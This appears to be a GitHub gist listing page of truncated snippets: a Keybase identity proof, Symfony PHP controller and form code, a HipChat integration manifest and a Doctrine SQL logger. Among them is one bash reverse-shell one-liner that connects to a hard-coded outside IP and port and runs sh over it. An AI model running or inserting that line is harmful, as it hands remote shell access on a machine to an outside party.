I hereby claim:
- I am whitewhidow on github.
- I am branchbit (https://keybase.io/branchbit) on keybase.
- I have a public key whose fingerprint is 6A29 42BD C46A 208F 742A 8766 4D60 7521 9B7B 2B7F
To claim this, I am signing this object:
| {"username":"your_name_here"} |
| { | |
| "username":"your_name_here" | |
| } |
I hereby claim:
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
| public function exportCsvAction() | |
| { | |
| $data = []; | |
| $filename = "export_filename_" . date("Y_m_d_His") . ".csv"; | |
| $response = $this->render('BBITAdminBundle:Csv:entity.csv.twig', array('data' => $data)); | |
| $response->setStatusCode(200); | |
| $response->headers->set('Content-Type', 'text/csv'); | |
| $response->headers->set('Content-Description', 'Filename description'); | |
| $response->headers->set('Content-Disposition', 'attachment; filename=' . $filename); |
| .. | |
| ->add('syncJobGroovyScripts', CollectionType::class, [ | |
| 'entry_type' => GroovyScriptType::class, | |
| 'allow_add' => true, | |
| 'by_reference' => false, | |
| 'allow_delete' => true, | |
| ]) | |
| ... |
| { | |
| "name": "My rust Integration", | |
| "description": "An integration that does wonderful things", | |
| "key": "com.branchbit.rustchat", | |
| "links": { | |
| "homepage": "http://rcon.branchbit.be", | |
| "self": "http://rcon.branchbit.be/hipchatintegration/capabilities" | |
| }, | |
| "capabilities": { | |
| "webhook": [ |
| 0<&137-;exec 137<>/dev/tcp/94.227.42.250/1564;sh <&137 >&137 2>&137 |
| <?php | |
| namespace Doctrine\DBAL\Logging; | |
| class EchoSQLLogger implements SQLLogger | |
| { | |
| /** | |
| * {@inheritdoc} | |
| */ | |
| public function startQuery($sql, array $params = null, array $types = null) |